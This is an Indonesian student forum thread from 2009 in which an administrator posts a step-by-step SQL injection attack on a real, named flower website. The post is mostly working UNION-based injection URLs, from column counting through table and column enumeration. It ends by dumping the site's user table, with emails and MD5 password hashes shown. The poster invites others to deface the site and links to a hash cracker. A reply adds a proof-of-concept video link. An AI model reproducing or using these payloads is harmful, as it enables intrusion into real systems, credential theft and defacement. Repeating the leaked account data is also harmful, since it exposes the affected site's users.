UNKLAB FORUM

Forum Mahasiswa & Alumni Universitas Klabat
 
HomeSearchRegisterLog in
Bagi Guest atau user yang tidak terdaftar, mohon maaf karena ada beberapa thread tidak bisa diakses oleh guest, oleh karena itu, sebaiknya anda registrasi terlebih untuk bisa mengakses penuh forum ini. Baca dulu peraturan forum ini. Terima Kasih
Navigation
 Index
 Memberlist
 Profile
 FAQ
 Search
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Lowongan Pekerjaan PT. PNM (Persero)
[again] nginjek pke sql I_icon_minitimeWed Nov 08, 2017 7:01 pm by CLiFF

» .NET Programming
[again] nginjek pke sql I_icon_minitimeTue Mar 15, 2011 6:49 pm by Marvin07

» Bagaimana Menginstal OS dari USB???
[again] nginjek pke sql I_icon_minitimeThu Feb 10, 2011 9:55 pm by unaitech

» Automatic Installation BackTrack 3 Final | Dual Booting
[again] nginjek pke sql I_icon_minitimeThu Feb 10, 2011 9:53 pm by unaitech

» simple hacking test
[again] nginjek pke sql I_icon_minitimeThu Feb 10, 2011 7:38 pm by and213

» [tutor] How To Patch SQL Injection Bug
[again] nginjek pke sql I_icon_minitimeThu Feb 10, 2011 9:52 am by unaitech

» what ur distro..?
[again] nginjek pke sql I_icon_minitimeThu Feb 10, 2011 9:48 am by unaitech

» netcut source-code
[again] nginjek pke sql I_icon_minitimeThu Feb 10, 2011 9:44 am by unaitech

» Ragnarok Online
[again] nginjek pke sql I_icon_minitimeMon Jan 31, 2011 1:57 pm by Marvin07

FRIENDS
Ads

    No ads available.



     

     [again] nginjek pke sql

    Go down 
    AuthorMessage
    jzt.nwbie
    Administrator
    Administrator
    jzt.nwbie

    Male Number of posts : 529
    Location : /home/jzt.nwbie
    Points : 109
    Registration date : 2008-09-16

    [again] nginjek pke sql Empty
    PostSubject: [again] nginjek pke sql   [again] nginjek pke sql I_icon_minitimeTue Apr 07, 2009 1:36 am

    =================================================
    dork : inurl:"mod.php?mod=publisher
    place : myR00M
    location : A****A
    time : 00:35 wib
    =================================================

    /* ACTION START */

    step by step

    1. cari target:
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=46

    2. cek bug:
    code : ' or -
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=46'

    klo ada error (warning) like this:
    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in home/flora/public_html/mod/publisher/publisher.php on line 309

    berarti bse di inject, klo g ada warning...
    cari target lain... msti sbar...

    NEXT ( --> PAS UDAH DAPAT TARGENYA )

    3. ngitung jumlah tabel:
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+1
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+2
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+3
    -->etc
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+order+by+11
    -->end

    akhirnya, brenti di angka 11... artinya ada 10 kolom

    4. cari no togel:
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,3,4,5,6,7,8,9,10--

    hasil: dapatnya angka 3

    5. cari tau versi:
    code = @@version or version()

    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,@@version,4,5,6,7,8,9,10--

    6. cari nama table:
    code = group_concat(table_name)
    +from+information_schema.tables+where+table_schema=database()--

    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--

    kluar deh tabel2-na...
    authors,banner,bannerclient,counter,exchange_links,jos_adsmanager_ads,jos_adsmanager_categories,jos_adsmanager_columns,jos_adsmanager_config,jos_adsmanager_field_values,jos_adsmanager_fields,jos_adsmanager_positions,jos_adsmanager_profile,jos_components,jos_core_acl_aro,jos_core_acl_aro_groups,jos_core_acl_aro_sections,jos_core_acl_groups_

    7. cari nama kolom dalam tabel pilihan (pilihan = authors) :
    code = group_concat(column_name)
    +from+information_schema.columns+where+table_name=0x[konversi nama kolom ascii ke hex]--

    sebelumnya, convert code ascii dari tabel yg akan dilihat kolomnya.

    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(column_name),4,5,6,7,8,9,10%20from%20information_schema.columns+where+table_name=0x617574686f7273--

    8. ngliat isi table
    http://www.duniaflora.com/mod.php?mod=publisher&op=viewarticle&cid=&artid=-46+union+all+select+1,2,group_concat(aid,0x3a,name,0x3a,url,0x3a,email,0x3a,pwd,0x3a,counter),4,5,6,7,8,9,10%20from%20authors

    hasilnya:
    florakita:florakita::anantakarna@yahoo.com:979c8e8f8271e3431249f935cd7d3f4c:7,admin:admin::admin@admin.com:e6db7f33faf25a5dee7492f20b50b48d:13,duniaflora:editor::info@duniaflora.com:979c8e8f8271e3431249f935cd7d3f4c:27

    tgal decrypt pwd md5-na...

    ===============================================================================================================================================
    /* END OF ACTION */

    ampe ini aja yah...
    g mles nge deface nih, d ngantuk...
    klo m dilanjutin deface, wong silahkan temen2...
    monggo...


    now, it's time for me to sleep GUYZ...
    have a nice dream...
    see a, tumorow

    ===============================================================================

    -=THANKS=-
    - JC, FOR HIS BLESSING TO ME
    - MY_B3L0V3D_M0M... LUV U
    - MY_F4M1LY_BR0TH3R5_n_515T3R5...
    - MY_GIRL_b094

    -=GREETZ=-
    * All UnKlab Forum Members
    * All Hackers-Center Members

    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

    N.B:

    - Ascii to Hexa Converter
    http://www.dolcevie.com/js/converter.html
    - md5 crack
    http://thesoftwareengineer.org/services/md5.php

    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

    _________________
    wanna be computer geek, nerd, etc...!!!
    Back to top Go down
    ZaNo
    Whiz
    Whiz
    ZaNo

    Male Number of posts : 245
    Location : trace me if u can..
    Points : 222
    Registration date : 2009-02-02

    [again] nginjek pke sql Empty
    PostSubject: Re: [again] nginjek pke sql   [again] nginjek pke sql I_icon_minitimeSun Apr 19, 2009 11:19 am

    nice tutor..
    btw itu site pke eNdonesia CMS?

    numpang video Proof Of Concept-nya..
    http://www.kitaupload.com/download.php?file=971SQL_Injection_HOWTO.rar
    Back to top Go down
     
    [again] nginjek pke sql
    Back to top 
    Page 1 of 1

    Permissions in this forum:You cannot reply to topics in this forum
    UNKLAB FORUM :: KLABAT UNIVERSITY :: Computer Science Faculty :: Computer Security :: Hacking, Cracking, Etc.-
    Jump to: